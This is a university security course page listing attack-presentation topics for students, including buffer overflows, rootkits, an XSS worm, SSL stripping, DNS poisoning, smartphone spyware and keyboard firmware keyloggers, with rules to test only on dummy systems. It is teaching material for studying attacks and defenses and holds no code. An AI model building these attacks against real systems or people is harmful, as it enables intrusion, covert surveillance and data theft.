Computer and Network Security

EECS 588 — Winter 2010

Overview | Schedule | Readings | Attack Presentation | Course Project

Guidelines

  1. Work with a partner. If you need a partner, try posting to the ctools forum.
  2. Review the list of topics below, and email me your top three choices, along with the name of your partner, by 5pm on Friday, January 15. I'll resolve conflicts and tell you which topic you've been assigned on Monday. Let me know if there are connections to your research area (e.g. machine learning or wireless networking), and I will take these into account when making the assignments.
  3. Write a fresh exploit—don't borrow from pre-packaged attack tools. You may, however, use general purpose tools such as packet sniffers.
  4. You must not test your attack against any real systems except as noted. If you need attack subjects, set up your own dummy systems or use a VM.
  5. If many systems are vulnerable to the attack, construct your demonstration with safety in mind. Design it so that it would be difficult to use against real systems even if it fell into the wrong hands.
  6. Some vulnerabilities have been fixed via software updates. If this is the case, you'll need to demonstrate your attack on an older version.
  7. Many topics include optional bonus challenges. I'll award extra credit proportional to the difficulty of the challenge.
  8. Give a 20 minute presentation in class on the specified date. In it, you should:
    1. Describe how the attack works, how it was discovered, how it was disclosed, and what damage is has caused.
    2. Talk about how you implemented it, including any challenges you faced.
    3. Give a demonstration of your exploit.
    4. Discuss defenses against the attack. If the attack has been fixed, describe how similar problems might be prevented in the future; if it's still a threat, suggest some defenses that might be investigated in new research.

Topics

* Starred topics will be easier if you have some familiarity with assembly language.
Web security topics will probably be in high demand. If you pick any of these attacks, please indicate at least two non-web topics that you'd like to do.

DateTopicDescription
1/26/10Modern buffer overflow* Pick a buffer overflow discovered in a major application during the past year and implement your own exploit. Explain how you bypassed modern defenses such as ASLR, DEP, and canaries, if applicable. These articles will help you get started. Bonus challenge: Find and exploit an undocumented buffer overflow in a popular program.
1/28/10Return-oriented programming* Create a dummy program containing a buffer overflow and exploit it using the technique described in this paper. Construct a Turing-complete set of gadgets using the suggested algorithm and demonstrate how this allows you to perform arbitrary computation without injecting any traditional code. Bonus challenge: Apply this to a buffer overflow in a real program.
2/2/10Compiler Trojan horse Modify GCC to implement the self-propagating compiler-resident Trojan horse suggested by Ken Thompson in Reflections on Trusting Trust. Your Trojan should propagate when GCC builds a new copy of itself, and it should inject a demonstration payload when compiling some standard utility program. Bonus challenge: Make a single Trojan that works with two or more compilers, propagating when each builds itself or the other.
2/4/10Kernel-level rootkit* For the operating system of your choice, construct a rootkit (like the one described here) that operates in kernel mode and hides from standard administrative tools; while running, it should not be visible in the file system, process list, or startup files. Bonus challenge: Implement a minimal hypervisor rootkit that loads on the fly and contains a basic payload. You can examine the BluePill source code, but you should reimplement the idea yourself.
2/9/10Malicious code in web sites† Part 1: Build a simple dummy social networking site and use it to demonstrate SQL injection, XSS, and CSRF vulnerabilities. Part 2: Construct an XSS worm to attack your site, like the Samy worm that infected MySpace. Part 3: Implement defenses against each threat. Bonus challenge: Discover an undocumented XSS vulnerability in a popular web site.
2/11/10Abusing cookies† Part 1: Build a simple dummy web site and use it to demonstrate XSS-based session hijacking and session fixation vulnerabilities. Part 2: Illustrate basic defenses against these attacks. Part 3: Show how history leaking and flash cookies can be used by a site to violate some protections of Chrome's Incognito mode. Bonus challenge: Find a related technique that can compromise the privacy of Tor users running TorButton.
2/16/10Fooling web users† Build a simple mock bank site and demonstrate: (1) an SSL stripping attack, where a man-in-the-middle transparently proxies HTTP requests and rewrites HTTPS links to point to look-alike HTTP links; (2) a clickjacking attack, as described here; (3) picture-in-picture and homograph attacks. Bonus challenge: Enhance your SSL attack to demonstrate the null prefix vulnerability (I'll provide a cert) and to defeat OCSP revocation.
2/18/10Browser DNS rebinding† Use Flash or Java to implement a DNS rebinding attack that subverts the browser's same origin policy. Show how this technique can be used to attack hosts behind a firewall.
2/23/10Password cracking with rainbow tables Implement a fast password cracker based on the Rainbow Table data structure (more details here). Compute a table containing SHA-1 hashes for as many passwords as you can (assuming a length of 8-characters or less). Adapt the wordlist and letter frequency approaches used by programs like John the Ripper. In class, demonstrate that you can quickly recover passwords from hashes provided by other students. Explain the time-memory trade-offs you faced and how you chose the parameters for your implementation.
2/25/10CAPTCHA cracking Start with a simple CAPTCHA (like one of these) and create a program that reliably defeats it. Extend your work to break at least two of these CAPTCHAs: AOL Mail, Sirius Radio, and eBay. You might adapt some of the techniques used by this work or this work. Bonus challenge: For major extra points, break reCAPTCHA or the Google CAPTCHA with at least 1% success.
3/9/10DNS cache poisoning Demonstrate Dan Kaminsky's fast DNS poisoning attack (another description), where the attacker brute forces responses to insert a false IP address into a DNS cache. Implement the countermeasure described in this paper.
3/11/10Multiuser keystroke eavesdropping This paper describes how an attacker with an account on a multiuser Linux system can exploit side channels to recover keystroke timing from other users. Develop a program to extract timings for login and show that it can be used to speed up password guessing. Bonus challenge: Extract timings for vim and implement a Hidden Markov Model to reconstruct English text.
3/16/10Rogue wireless access point* Modify an open-source wireless access point to conduct a man-in-the-middle attack against users who connect through it. Whenever a binary is downloaded via HTTP, modify it on the fly to insert a Trojan horse. I will provide a Linksys WRT54G router. Bonus challenge: Support HTTPS, exploiting the null prefix vulnerability (I'll provide a cert) and defeating OCSP revocation.
3/18/10Smartphone spyware Develop a demonstration spyware program for Android or jailbroken iPhones. Your program should illustrate the dangers of surreptitious data theft, recording, photographing, and location tracking. Think like an attacker: How would you convince users to install the software? How would you conceal it? How would you exfiltrate collected data? Make your demo as realistic as possible. Bonus challenge: Exploit a known iPhone bug to install your spyware without jailbreaking.
3/23/10Traffic de-anonymization Set up a simple anonymizer service that lets users establish an SSH tunnel to a server running an HTTP proxy. An attacker on the network near a web server could modify all outgoing packets to insert a covert watermark by altering their sizes or timing. An accomplice monitoring SSH packets arriving at the client could detect the watermark to tell that the user is visiting that site. Demonstrate such an attack. Bonus challenge: Make your attack work against Tor.
3/30/10Cold-boot attack Targeting a popular disk encryption product, create an automated tool to implement the attacks described here. Your tool should recover memory contents after a cold reboot, locate the encryption keys, and provide access to the disk contents. You may use existing memory imaging tools as part of your implementation. Bonus challenge: Target BitLocker.
4/1/10Firmware-resident malware*Reproduce the results from this paper to show that malicious firmware can be loaded onto the Apple Aluminum Keyboard. Make a simple payload that records the first few characters typed after power on (likely the login password) and replays them when a secret key combination is pressed. I'll provide a keyboard. You may need a Mac for this project. Bonus challenge: Implement a full keylogger, using the keyboard's flash memory for nonvolatile storage.